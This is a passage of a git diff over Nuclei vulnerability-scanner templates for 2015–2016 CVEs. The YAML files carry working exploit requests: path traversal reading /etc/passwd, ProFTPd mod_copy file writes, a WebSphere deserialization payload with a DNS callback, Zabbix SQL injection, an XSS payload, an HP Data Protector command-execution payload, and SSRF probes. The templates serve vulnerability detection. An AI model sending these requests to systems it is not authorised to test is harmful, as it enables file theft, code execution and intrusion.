- - https://nvd.nist.gov/vuln/detail/CVE-2015-1503
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cve-id: CVE-2015-1503
- cwe-id: CWE-200
- tags: cve,cve2015,icewarp,lfi,mail
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"
- - "{{BaseURL}}/webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:[x*]:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2015/cve-2015-2080.yaml b/nuclei-templates/CVE-2015/cve-2015-2080.yaml
deleted file mode 100644
index 67ed7522de..0000000000
--- a/nuclei-templates/CVE-2015/cve-2015-2080.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: CVE-2015-2080
-
-info:
- name: Eclipse Jetty Remote Leakage
- author: pikpikcu
- severity: high
- reference:
- - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
- - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
- - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
- description: |
- The exception handling code in Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header, aka JetLeak
- tags: cve,cve2015,jetty
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
- cve-id: CVE-2015-2080
- cwe-id: CWE-200
-
-requests:
- - method: POST
- path:
- - "{{BaseURL}}"
- headers:
- Referer: \x00
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 400
- - type: word
- words:
- - "Illegal character 0x0 in state"
- part: body
diff --git a/nuclei-templates/CVE-2015/cve-2015-2166.yaml b/nuclei-templates/CVE-2015/cve-2015-2166.yaml
deleted file mode 100644
index 7384cd586b..0000000000
--- a/nuclei-templates/CVE-2015/cve-2015-2166.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2015-2166
-
-info:
- name: Ericsson Drutt MSDP (Instance Monitor) Directory Traversal
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.
- reference:
- - https://www.exploit-db.com/exploits/36619
- - https://nvd.nist.gov/vuln/detail/CVE-2015-2166
- tags: cve,cve2015,lfi,ericsson
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
-
- matchers-condition: and
- matchers:
- - type: regex
- part: body
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2015/CVE-2015-2807.yaml b/nuclei-templates/CVE-2015/cve-2015-2807.yaml
similarity index 100%
rename from nuclei-templates/CVE-2015/CVE-2015-2807.yaml
rename to nuclei-templates/CVE-2015/cve-2015-2807.yaml
diff --git a/nuclei-templates/CVE-2015/cve-2015-3306.yaml b/nuclei-templates/CVE-2015/cve-2015-3306.yaml
deleted file mode 100644
index 11942f4ccc..0000000000
--- a/nuclei-templates/CVE-2015/cve-2015-3306.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2015-3306
-
-info:
- name: ProFTPd RCE
- author: pdteam
- severity: high
- reference: https://github.com/t0kx/exploit-CVE-2015-3306
- description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
- tags: cve,cve2015,ftp,rce,network,proftpd
-
-network:
- - inputs:
- - data: "site cpfr /proc/self/cmdline\r\n"
- read: 1024
- - data: "site cpto /tmp/.{{randstr}}\r\n"
- read: 1024
- - data: "site cpfr /tmp/.{{randstr}}\r\n"
- read: 1024
- - data: "site cpto /var/www/html/{{randstr}}\r\n"
-
- host:
- - "{{Hostname}}"
- - "{{Host}}:21"
-
- read-size: 1024
- matchers:
- - type: word
- part: raw
- words:
- - "Copy successful"
diff --git a/nuclei-templates/CVE-2015/cve-2015-3337.yaml b/nuclei-templates/CVE-2015/cve-2015-3337.yaml
deleted file mode 100644
index 54768b240b..0000000000
--- a/nuclei-templates/CVE-2015/cve-2015-3337.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: CVE-2015-3337
-
-info:
- name: Elasticsearch Head plugin LFI
- author: pdteam
- severity: high
- description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
- reference: https://www.exploit-db.com/exploits/37054/
- tags: cve,cve2015,elastic,lfi,elasticsearch,plugin
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0"
- part: body
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2015/cve-2015-4414.yaml b/nuclei-templates/CVE-2015/cve-2015-4414.yaml
new file mode 100644
index 0000000000..ac61202462
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-4414.yaml
@@ -0,0 +1,27 @@
+id: CVE-2015-4414
+
+info:
+ name: WordPress Plugin SE HTML5 Album Audio Player 1.1.0 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/37274
+ - https://www.cvedetails.com/cve/CVE-2015-4414
+ tags: cve,cve2015,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=/wp-content/uploads/../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2015/cve-2015-4632.yaml b/nuclei-templates/CVE-2015/cve-2015-4632.yaml
deleted file mode 100644
index 6e9567001c..0000000000
--- a/nuclei-templates/CVE-2015/cve-2015-4632.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2015-4632
-
-info:
- name: Koha 3.20.1 - Directory Traversal
- author: daffainfo
- severity: high
- description: Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
- reference: |
- - https://www.exploit-db.com/exploits/37388
- - https://www.cvedetails.com/cve/CVE-2015-4632
- tags: cve,cve2015,lfi
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
- cve-id: CVE-2015-4632
- cwe-id: CWE-22
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2015/CVE-2015-4668.yaml b/nuclei-templates/CVE-2015/cve-2015-4668.yaml
similarity index 100%
rename from nuclei-templates/CVE-2015/CVE-2015-4668.yaml
rename to nuclei-templates/CVE-2015/cve-2015-4668.yaml
diff --git a/nuclei-templates/CVE-2015/cve-2015-4694.yaml b/nuclei-templates/CVE-2015/cve-2015-4694.yaml
new file mode 100644
index 0000000000..97b8256f1d
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-4694.yaml
@@ -0,0 +1,30 @@
+id: CVE-2015-4694
+
+info:
+ name: Zip Attachments <= 1.1.4 - Arbitrary File Download
+ author: 0x_Akoko
+ severity: high
+ description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file.
+ reference: https://wpscan.com/vulnerability/8047
+ tags: lfi,wordpress,cve,cve2015,wp-plugin
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.60
+ cve-id: CVE-2015-4694
+ cwe-id: CWE-22
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd'
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2015/cve-2015-5354.yaml b/nuclei-templates/CVE-2015/cve-2015-5354.yaml
new file mode 100644
index 0000000000..387ce0d925
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-5354.yaml
@@ -0,0 +1,42 @@
+id: CVE-2015-5354
+
+info:
+ name: Novius OS 5.0.1-elche - Open Redirect
+ author: 0x_Akoko
+ severity: medium
+ description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.
+ impact: |
+ An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware.
+ remediation: |
+ Apply the latest security patches or upgrade to a newer version of Novius OS.
+ reference:
+ - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
+ - https://vuldb.com/?id.76181
+ - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html
+ - https://nvd.nist.gov/vul n/detail/CVE-2015-5354
+ - https://www.exploit-db.com/exploits/37439/
+ classification:
+ cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N
+ cvss-score: 5.8
+ cve-id: CVE-2015-5354
+ cwe-id: CWE-601
+ epss-score: 0.00166
+ epss-percentile: 0.53247
+ cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: novius-os
+ product: novius_os
+ tags: cve2015,cve,packetstorm,redirect,novius,novius-os,xss
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
+# digest: 4a0a0047304502201fa0d9d2f70b020f889d8f45ac1c39f17dc563a71461963cc4c57b569f70d096022100ef358f446f62fcfbf11e15fb21855a3061d1f1cd2c38509a6fa7fc32a0256bf7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2015/cve-2015-5471.yaml b/nuclei-templates/CVE-2015/cve-2015-5471.yaml
deleted file mode 100644
index 37ed1b5e40..0000000000
--- a/nuclei-templates/CVE-2015/cve-2015-5471.yaml
+++ /dev/null
@@ -1,32 +0,0 @@
-id: CVE-2015-5471
-info:
- name: Swim Team <= v1.44.10777 - Local File Inclusion
- author: 0x_Akoko
- severity: medium
- description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files.
- reference:
- - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
- - http://www.vapid.dhs.org/advisory.php?v=134
- - https://nvd.nist.gov/vuln/detail/CVE-2015-5471
- tags: cve,cve2015,wordpress,wp-plugin,lfi
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
- cvss-score: 5.30
- cve-id: CVE-2015-5471
- cwe-id: CWE-22
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:[x*]:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2015/cve-2015-5531.yaml b/nuclei-templates/CVE-2015/cve-2015-5531.yaml
new file mode 100644
index 0000000000..de74ca8495
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-5531.yaml
@@ -0,0 +1,52 @@
+id: CVE-2015-5531
+info:
+ name: ElasticSearch directory traversal vulnerability (CVE-2015-5531)
+ author: princechaddha
+ severity: high
+ description: Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.
+ reference:
+ - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-5531
+ tags: cve,cve2015,elasticsearch
+
+requests:
+ - raw:
+ - |
+ PUT /_snapshot/test HTTP/1.1
+ Host: {{Hostname}}
+
+ {
+ "type": "fs",
+ "settings": {
+ "location": "/usr/share/elasticsearch/repo/test"
+ }
+ }
+
+ - |
+ PUT /_snapshot/test2 HTTP/1.1
+ Host: {{Hostname}}
+
+ {
+ "type": "fs",
+ "settings": {
+ "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata"
+ }
+ }
+
+ - |
+ GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'ElasticsearchParseException'
+ - 'Failed to derive xcontent from'
+ - '114, 111, 111, 116, 58'
+ condition: and
+
+ - type: status
+ status:
+ - 400
diff --git a/nuclei-templates/CVE-2015/CVE-2015-6544.yaml b/nuclei-templates/CVE-2015/cve-2015-6544.yaml
similarity index 100%
rename from nuclei-templates/CVE-2015/CVE-2015-6544.yaml
rename to nuclei-templates/CVE-2015/cve-2015-6544.yaml
diff --git a/nuclei-templates/CVE-2015/CVE-2015-7377.yaml b/nuclei-templates/CVE-2015/cve-2015-7377.yaml
similarity index 100%
rename from nuclei-templates/CVE-2015/CVE-2015-7377.yaml
rename to nuclei-templates/CVE-2015/cve-2015-7377.yaml
diff --git a/nuclei-templates/CVE-2015/cve-2015-7450.yaml b/nuclei-templates/CVE-2015/cve-2015-7450.yaml
new file mode 100644
index 0000000000..9d3958a8e5
--- /dev/null
+++ b/nuclei-templates/CVE-2015/cve-2015-7450.yaml
@@ -0,0 +1,56 @@
+id: CVE-2015-7450
+
+info:
+ name: IBM WebSphere Java Object Deserialization RCE
+ author: wdahlenb
+ severity: critical
+ description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default)
+ reference:
+ - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py
+ - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450
+ tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.80
+ cve-id: CVE-2015-7450
+ cwe-id: CWE-94
+
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml; charset=utf-8
+ SOAPAction: "urn:AdminService"
+
+
+
+
+
+
+
+ rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==
+ getUnsavedChanges
+ {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}}
+ rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=
+
+
+
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 500
+
+ - type: word
+ words:
+ - 'SOAP-ENV:Server'
+ - ''
+ condition: and
+
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
diff --git a/nuclei-templates/CVE-2015/cve-2015-8813.yaml b/nuclei-templates/CVE-2015/cve-2015-8813.yaml
deleted file mode 100644
index cfc4cd20e0..0000000000
--- a/nuclei-templates/CVE-2015/cve-2015-8813.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2015-8813
-
-info:
- name: Umbraco SSRF Vulnerability in Feedproxy.aspx
- author: emadshanab
- severity: high
- description: A Server Side Request Forgery (SSRF) vulnerability in Umbraco in Feedproxy.aspx allows attackers to send arbitrary HTTP GET requests.Once you change the URL to the http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index, you able to access the localhost application of the server
- reference:
- - https://blog.securelayer7.net/umbraco-the-open-source-asp-net-cms-multiple-vulnerabilities/
- - https://nvd.nist.gov/vuln/detail/CVE-2015-8813
- tags: cve,cve2015,ssrf,oast,umbraco
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:N
- cvss-score: 8.20
- cve-id: CVE-2015-8813
- cwe-id: CWE-918
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/Umbraco/feedproxy.aspx?url=http://{{interactsh-url}}"
-
- matchers:
- - type: word
- part: interactsh_protocol # Confirms the HTTP Interaction
- words:
- - "http"
diff --git a/nuclei-templates/CVE-2015/CVE-2015-9414.yaml b/nuclei-templates/CVE-2015/cve-2015-9414.yaml
similarity index 100%
rename from nuclei-templates/CVE-2015/CVE-2015-9414.yaml
rename to nuclei-templates/CVE-2015/cve-2015-9414.yaml
diff --git a/nuclei-templates/CVE-2016/CVE-2016-0957.yaml b/nuclei-templates/CVE-2016/CVE-2016-0957.yaml
deleted file mode 100644
index d2fb10609d..0000000000
--- a/nuclei-templates/CVE-2016/CVE-2016-0957.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: CVE-2016-0957
-
-info:
- name: Adobe AEM Console Disclosure
- author: geeknik
- severity: high
- description: Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.
- reference:
- - https://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html
- - https://helpx.adobe.com/security/products/experience-manager/apsb16-05.html
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cve-id: CVE-2016-0957
- tags: cve,cve2016,adobe,aem
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/system/console?.css"
- headers:
- Authorization: "Basic YWRtaW46YWRtaW4K"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
- - type: word
- words:
- - "Adobe"
- - "java.lang"
- - "(Runtime)"
- condition: and
diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000129.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000129.yaml
deleted file mode 100644
index c3dbf88278..0000000000
--- a/nuclei-templates/CVE-2016/CVE-2016-1000129.yaml
+++ /dev/null
@@ -1,39 +0,0 @@
-id: CVE-2016-1000129
-
-info:
- name: defa-online-image-protector <= 3.3 - Reflected Cross-Site Scripting (XSS)
- author: daffainfo
- severity: medium
- description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2016-1000129
- - https://wordpress.org/plugins/defa-online-image-protector
- - http://www.vapidlabs.com/wp/wp_advisory.php?v=449
- - http://web.archive.org/web/20210614204644/https://www.securityfocus.com/bid/93892
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cve-id: CVE-2016-1000129
- cwe-id: CWE-79
- tags: cve,cve2016,wordpress,xss,wp-plugin
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ""
- part: body
-
- - type: word
- part: header
- words:
- - text/html
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000140.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000140.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/cve-2016-1000140.yaml
rename to nuclei-templates/CVE-2016/CVE-2016-1000140.yaml
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000141.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000141.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/cve-2016-1000141.yaml
rename to nuclei-templates/CVE-2016/CVE-2016-1000141.yaml
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000143.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000143.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/cve-2016-1000143.yaml
rename to nuclei-templates/CVE-2016/CVE-2016-1000143.yaml
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000153.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000153.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/cve-2016-1000153.yaml
rename to nuclei-templates/CVE-2016/CVE-2016-1000153.yaml
diff --git a/nuclei-templates/CVE-2016/cve-2016-1000155.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000155.yaml
similarity index 100%
rename from nuclei-templates/CVE-2016/cve-2016-1000155.yaml
rename to nuclei-templates/CVE-2016/CVE-2016-1000155.yaml
diff --git a/nuclei-templates/CVE-2016/CVE-2016-10134.yaml b/nuclei-templates/CVE-2016/CVE-2016-10134.yaml
deleted file mode 100644
index ff799121d8..0000000000
--- a/nuclei-templates/CVE-2016/CVE-2016-10134.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: CVE-2016-10134
-
-info:
- name: Zabbix - SQL Injection
- author: princechaddha
- severity: critical
- description: Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.
- reference:
- - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
- - https://nvd.nist.gov/vuln/detail/CVE-2016-10134
- - https://support.zabbix.com/browse/ZBX-11023
- - https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=850936
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2016-10134
- cwe-id: CWE-89
- tags: cve,cve2016,zabbix,sqli,vulhub
- metadata:
- max-request: 1
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - 'Error in query [INSERT INTO profiles (profileid, userid'
- - 'You have an error in your SQL syntax'
- condition: and
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/05/10
diff --git a/nuclei-templates/CVE-2016/CVE-2016-10956.yaml b/nuclei-templates/CVE-2016/CVE-2016-10956.yaml
new file mode 100644
index 0000000000..25c5fdb2e7
--- /dev/null
+++ b/nuclei-templates/CVE-2016/CVE-2016-10956.yaml
@@ -0,0 +1,34 @@
+id: CVE-2016-10956
+
+info:
+ name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
+ author: daffainfo,0x240x23elu
+ severity: high
+ description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php.
+ reference:
+ - https://cxsecurity.com/issue/WLB-2016080220
+ - https://wpvulndb.com/vulnerabilities/8609
+ - https://wordpress.org/plugins/mail-masta/#developers
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2016-10956
+ cwe-id: CWE-20
+ tags: cve,cve2016,wordpress,wp-plugin,lfi,mail
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
+ - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ part: body
+ - type: status
+ status:
+ - 200
+ - 500
diff --git a/nuclei-templates/CVE-2016/CVE-2016-2004.yaml b/nuclei-templates/CVE-2016/CVE-2016-2004.yaml
deleted file mode 100644
index fc2306739b..0000000000
--- a/nuclei-templates/CVE-2016/CVE-2016-2004.yaml
+++ /dev/null
@@ -1,35 +0,0 @@
-id: CVE-2016-2004
-
-info:
- name: HP Data Protector - Arbitrary Command Execution
- author: pussycat0x
- severity: critical
- description: HPE Data Protector before 7.03_108, 8.x before 8.15, and 9.x before 9.06 allow remote attackers to execute arbitrary code via unspecified vectors related to lack of authentication. This vulnerability exists because of an incomplete fix for CVE-2014-2623.
- reference:
- - https://www.exploit-db.com/exploits/39858
- - https://nvd.nist.gov/vuln/detail/CVE-2016-2004
- - http://www.kb.cert.org/vuls/id/267328
- - https://www.exploit-db.com/exploits/39858/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2016-2004
- cwe-id: CWE-306
- tags: cve,cve2016,network,iot,hp,rce
-
-network:
- - inputs:
- - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami
- type: hex
-
- host:
- - "{{Hostname}}"
- - "{{Host}}:5555"
-
- matchers:
- - type: word
- encoding: hex
- words:
- - "00000034fffe3900000020006e007400200061007500740068006f0072006900740079005c00730079007300740065006d000a0000000000" # authority\system
-
-# Enhanced by mp on 2022/05/10
diff --git a/nuclei-templates/CVE-2016/CVE-2016-2389.yaml b/nuclei-templates/CVE-2016/CVE-2016-2389.yaml
new file mode 100644
index 0000000000..33b554b186
--- /dev/null
+++ b/nuclei-templates/CVE-2016/CVE-2016-2389.yaml
@@ -0,0 +1,34 @@
+id: CVE-2016-2389
+
+info:
+ name: SAP xMII 15.0 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
+ reference:
+ - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
+ - https://www.cvedetails.com/cve/CVE-2016-2389
+ - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
+ - https://www.exploit-db.com/exploits/39837/
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2016-2389
+ cwe-id: CWE-22
+ tags: cve,cve2016,lfi,sap
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2016/CVE-2016-3978.yaml b/nuclei-templates/CVE-2016/CVE-2016-3978.yaml
deleted file mode 100644
index cac025448e..0000000000
--- a/nuclei-templates/CVE-2016/CVE-2016-3978.yaml
+++ /dev/null
@@ -1,40 +0,0 @@
-id: CVE-2016-3978
-
-info:
- name: Fortinet FortiOS - Open Redirect/Cross-Site Scripting
- author: 0x_Akoko
- severity: medium
